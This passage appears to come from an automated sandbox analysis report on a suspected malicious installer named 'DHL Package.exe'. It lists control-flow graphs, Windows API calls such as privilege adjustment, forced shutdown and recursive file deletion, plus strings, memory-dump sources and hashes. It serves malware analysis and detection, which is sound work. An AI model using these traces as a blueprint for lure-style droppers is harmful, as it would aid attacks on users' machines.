                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403982
                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
                                                                                                • ExitProcess.KERNEL32 ref: 004039CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\DHL Package.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peggle$C:\Users\user\AppData\Local\peggle\Dilettantkomediers$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Package.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                • API String ID: 3441113951-557215561
                                                                                                • Opcode ID: 45b82c846e153b5322f76d200fb5aca8c4b541a6c4aaf17c248ce3d8fb595d41
                                                                                                • Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
                                                                                                • Opcode Fuzzy Hash: 45b82c846e153b5322f76d200fb5aca8c4b541a6c4aaf17c248ce3d8fb595d41
                                                                                                • Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 139 405582-40559d 140 4055a3-40566a GetDlgItem * 3 call 404366 call 404cbf GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40572c-405733 139->141 159 405688-40568b 140->159 160 40566c-405686 SendMessageW * 2 140->160 143 405735-405757 GetDlgItem CreateThread FindCloseChangeNotification 141->143 144 40575d-40576a 141->144 143->144 145 405788-405792 144->145 146 40576c-405772 144->146 150 405794-40579a 145->150 151 4057e8-4057ec 145->151 148 405774-405783 ShowWindow * 2 call 404366 146->148 149 4057ad-4057b6 call 404398 146->149 148->145 163 4057bb-4057bf 149->163 156 4057c2-4057d2 ShowWindow 150->156 157 40579c-4057a8 call 40430a 150->157 151->149 154 4057ee-4057f4 151->154 154->149 161 4057f6-405809 SendMessageW 154->161 164 4057e2-4057e3 call 40430a 156->164 165 4057d4-4057dd call 405443 156->165 157->149 166 40569b-4056b2 call 404331 159->166 167 40568d-405699 SendMessageW 159->167 160->159 168 40590b-40590d 161->168 169 40580f-40583a CreatePopupMenu call 406418 AppendMenuW 161->169 164->151 165->164 178 4056b4-4056c8 ShowWindow 166->178 179 4056e8-405709 GetDlgItem SendMessageW 166->179 167->166 168->163 176 40583c-40584c GetWindowRect 169->176 177 40584f-405864 TrackPopupMenu 169->177 176->177 177->168 180 40586a-405881 177->180 181 4056d7 178->181 182 4056ca-4056d5 ShowWindow 178->182 179->168 183 40570f-405727 SendMessageW * 2 179->183 184 405886-4058a1 SendMessageW 180->184 185 4056dd-4056e3 call 404366 181->185 182->185 183->168 184->184 186 4058a3-4058c6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058c8-4058ef SendMessageW 186->188 188->188 189 4058f1-405905 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004055E0
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004055EF
                                                                                                • GetClientRect.USER32(?,?), ref: 0040562C
                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405633
                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
                                                                                                • ShowWindow.USER32(?,00000008), ref: 004056CF
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004056F0
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004055FE
                                                                                                  • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405742
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005516,00000000), ref: 00405750
                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405757
                                                                                                • ShowWindow.USER32(00000000), ref: 0040577B
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405780
                                                                                                • ShowWindow.USER32(00000008), ref: 004057CA
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
                                                                                                • CreatePopupMenu.USER32 ref: 0040580F
                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
                                                                                                • GetWindowRect.USER32(?,?), ref: 00405843
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
                                                                                                • OpenClipboard.USER32(00000000), ref: 004058A4
                                                                                                • EmptyClipboard.USER32 ref: 004058AA
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004058C0
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004058F4
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
                                                                                                • CloseClipboard.USER32 ref: 00405905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 4154960007-366298937
                                                                                                • Opcode ID: d2ff847ff4ec71b1cce3c4311f9d311e65ace06014fcbcb193fe2448cc8158ae
                                                                                                • Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
                                                                                                • Opcode Fuzzy Hash: d2ff847ff4ec71b1cce3c4311f9d311e65ace06014fcbcb193fe2448cc8158ae
                                                                                                • Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 499 405aed-405b13 call 405db8 502 405b15-405b27 DeleteFileW 499->502 503 405b2c-405b33 499->503 504 405ca9-405cad 502->504 505 405b35-405b37 503->505 506 405b46-405b56 call 4063db 503->506 507 405c57-405c5c 505->507 508 405b3d-405b40 505->508 512 405b65-405b66 call 405cfc 506->512 513 405b58-405b63 lstrcatW 506->513 507->504 511 405c5e-405c61 507->511 508->506 508->507 514 405c63-405c69 511->514 515 405c6b-405c73 call 406739 511->515 517 405b6b-405b6f 512->517 513->517 514->504 515->504 523 405c75-405c89 call 405cb0 call 405aa5 515->523 520 405b71-405b79 517->520 521 405b7b-405b81 lstrcatW 517->521 520->521 522 405b86-405ba2 lstrlenW FindFirstFileW 520->522 521->522 524 405ba8-405bb0 522->524 525 405c4c-405c50 522->525 539 405ca1-405ca4 call 405443 523->539 540 405c8b-405c8e 523->540 527 405bd0-405be4 call 4063db 524->527 528 405bb2-405bba 524->528 525->507 530 405c52 525->530 541 405be6-405bee 527->541 542 405bfb-405c06 call 405aa5 527->542 531 405bbc-405bc4 528->531 532 405c2f-405c3f FindNextFileW 528->532 530->507 531->527 535 405bc6-405bce 531->535 532->524 538 405c45-405c46 FindClose 532->538 535->527 535->532 538->525 539->504 540->514 543 405c90-405c9f call 405443 call 4061a1 540->543 541->532 544 405bf0-405bf9 call 405aed 541->544 550 405c27-405c2a call 405443 542->550 551 405c08-405c0b 542->551 543->504 544->532 550->532 554 405c0d-405c1d call 405443 call 4061a1 551->554 555 405c1f-405c25 551->555 554->532 555->532
                                                                                                APIs
                                                                                                • DeleteFileW.KERNELBASE(?,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B16
                                                                                                • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405B5E
                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405B81
                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B87
                                                                                                • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B97
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C46
                                                                                                Strings
                                                                                                • \*.*, xrefs: 00405B58
                                                                                                • "C:\Users\user\Desktop\DHL Package.exe", xrefs: 00405AED
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\DHL Package.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-3275289347
                                                                                                • Opcode ID: 9036ba2aa722766dc29abb0410fb58961029e1c042b72e4e8ea17b50247261c3
                                                                                                • Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
                                                                                                • Opcode Fuzzy Hash: 9036ba2aa722766dc29abb0410fb58961029e1c042b72e4e8ea17b50247261c3
                                                                                                • Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                                                • Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
                                                                                                • Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                                                • Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(77163420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\), ref: 00406744
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406750
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID: XgB
                                                                                                • API String ID: 2295610775-796949446
                                                                                                • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                • Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
                                                                                                • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                • Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402911
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 3a3c8e021aac443e7d1b39a8b6dfaba58084c306ccb8c3208a910f709684840e
                                                                                                • Instruction ID: 8edab8899b0228974304dfa76bdc964f5a5729fff09c5fb89d7f9bd6055596d6
                                                                                                • Opcode Fuzzy Hash: 3a3c8e021aac443e7d1b39a8b6dfaba58084c306ccb8c3208a910f709684840e
                                                                                                • Instruction Fuzzy Hash: ADF05E71A041049AC700DFA4D9499AEB374EF10314F61457BE912F21E0D7B85E119B2A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 190 403e58-403e6a 191 403e70-403e76 190->191 192 403fab-403fba 190->192 191->192 195 403e7c-403e85 191->195 193 404009-40401e 192->193 194 403fbc-404004 GetDlgItem * 2 call 404331 SetClassLongW call 40140b 192->194 197 404020-404023 193->197 198 40405e-404063 call 40437d 193->198 194->193 199 403e87-403e94 SetWindowPos 195->199 200 403e9a-403e9d 195->200 204 404025-404030 call 401389 197->204 205 404056-404058 197->205 212 404068-404083 198->212 199->200 201 403eb7-403ebd 200->201 202 403e9f-403eb1 ShowWindow 200->202 207 403ed9-403edc 201->207 208 403ebf-403ed4 DestroyWindow 201->208 202->201 204->205 227 404032-404051 SendMessageW 204->227 205->198 211 4042fe 205->211 216 403ede-403eea SetWindowLongW 207->216 217 403eef-403ef5 207->217 213 4042db-4042e1 208->213 215 404300-404307 211->215 219 404085-404087 call 40140b 212->219 220 40408c-404092 212->220 213->211 222 4042e3-4042e9 213->222 216->215 225 403f98-403fa6 call 404398 217->225 226 403efb-403f0c GetDlgItem 217->226 219->220 223 404098-4040a3 220->223 224 4042bc-4042d5 DestroyWindow EndDialog 220->224 222->211 228 4042eb-4042f4 ShowWindow 222->228 223->224 229 4040a9-4040f6 call 406418 call 404331 * 3 GetDlgItem 223->229 224->213 225->215 230 403f2b-403f2e 226->230 231 403f0e-403f25 SendMessageW IsWindowEnabled 226->231 227->215 228->211 260 404100-40413c ShowWindow KiUserCallbackDispatcher call 404353 EnableWindow 229->260 261 4040f8-4040fd 229->261 234 403f30-403f31 230->234 235 403f33-403f36 230->235 231->211 231->230 238 403f61-403f66 call 40430a 234->238 239 403f44-403f49 235->239 240 403f38-403f3e 235->240 238->225 244 403f7f-403f92 SendMessageW 239->244 245 403f4b-403f51 239->245 243 403f40-403f42 240->243 240->244 243->238 244->225 246 403f53-403f59 call 40140b 245->246 247 403f68-403f71 call 40140b 245->247 256 403f5f 246->256 247->225 257 403f73-403f7d 247->257 256->238 257->256 264 404141 260->264 265 40413e-40413f 260->265 261->260 266 404143-404171 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404173-404184 SendMessageW 266->267 268 404186 266->268 269 40418c-4041cb call 404366 call 403e39 call 4063db lstrlenW call 406418 SetWindowTextW call 401389 267->269 268->269 269->212 280 4041d1-4041d3 269->280 280->212 281 4041d9-4041dd 280->281 282 4041fc-404210 DestroyWindow 281->282 283 4041df-4041e5 281->283 282->213 285 404216-404243 CreateDialogParamW 282->285 283->211 284 4041eb-4041f1 283->284 284->212 286 4041f7 284->286 285->213 287 404249-4042a0 call 404331 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 4042a2-4042b5 ShowWindow call 40437d 287->292 294 4042ba 292->294 294->213
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
                                                                                                • ShowWindow.USER32(?), ref: 00403EB1
                                                                                                • DestroyWindow.USER32 ref: 00403EC5
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403F02
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F1D
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403FCB
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403FD5
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 004040E6
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404107
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404119
                                                                                                • EnableWindow.USER32(?,?), ref: 00404134
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404151
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
                                                                                                • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
                                                                                                • SetWindowTextW.USER32(?,00423708), ref: 004041BA
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004042EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0
                                                                                                • Opcode ID: d83b3cb20f42b8f676c26746797d707651e156971b34bf602c1fafe6ed444bae
                                                                                                • Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
                                                                                                • Opcode Fuzzy Hash: d83b3cb20f42b8f676c26746797d707651e156971b34bf602c1fafe6ed444bae
                                                                                                • Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 295 403aaa-403ac2 call 4067d0 298 403ac4-403ad4 call 406322 295->298 299 403ad6-403b0d call 4062a9 295->299 308 403b30-403b59 call 403d80 call 405db8 298->308 304 403b25-403b2b lstrcatW 299->304 305 403b0f-403b20 call 4062a9 299->305 304->308 305->304 313 403beb-403bf3 call 405db8 308->313 314 403b5f-403b64 308->314 320 403c01-403c26 LoadImageW 313->320 321 403bf5-403bfc call 406418 313->321 314->313 315 403b6a-403b92 call 4062a9 314->315 315->313 322 403b94-403b98 315->322 324 403ca7-403caf call 40140b 320->324 325 403c28-403c58 RegisterClassW 320->325 321->320 326 403baa-403bb6 lstrlenW 322->326 327 403b9a-403ba7 call 405cdd 322->327 339 403cb1-403cb4 324->339 340 403cb9-403cc4 call 403d80 324->340 328 403d76 325->328 329 403c5e-403ca2 SystemParametersInfoW CreateWindowExW 325->329 333 403bb8-403bc6 lstrcmpiW 326->333 334 403bde-403be6 call 405cb0 call 4063db 326->334 327->326 332 403d78-403d7f 328->332 329->324 333->334 338 403bc8-403bd2 GetFileAttributesW 333->338 334->313 343 403bd4-403bd6 338->343 344 403bd8-403bd9 call 405cfc 338->344 339->332 348 403cca-403ce4 ShowWindow call 406760 340->348 349 403d4d-403d4e call 405516 340->349 343->334 343->344 344->334 356 403cf0-403d02 GetClassInfoW 348->356 357 403ce6-403ceb call 406760 348->357 352 403d53-403d55 349->352 354 403d57-403d5d 352->354 355 403d6f-403d71 call 40140b 352->355 354->339 358 403d63-403d6a call 40140b 354->358 355->328 361 403d04-403d14 GetClassInfoW RegisterClassW 356->361 362 403d1a-403d3d DialogBoxParamW call 40140b 356->362 357->356 358->339 361->362 366 403d42-403d4b call 4039fa 362->366 366->332
                                                                                                APIs
                                                                                                  • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                  • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                • lstrcatW.KERNEL32(1033,00423708), ref: 00403B2B
                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\peggle,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,77163420), ref: 00403BAB
                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\peggle,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403BC9
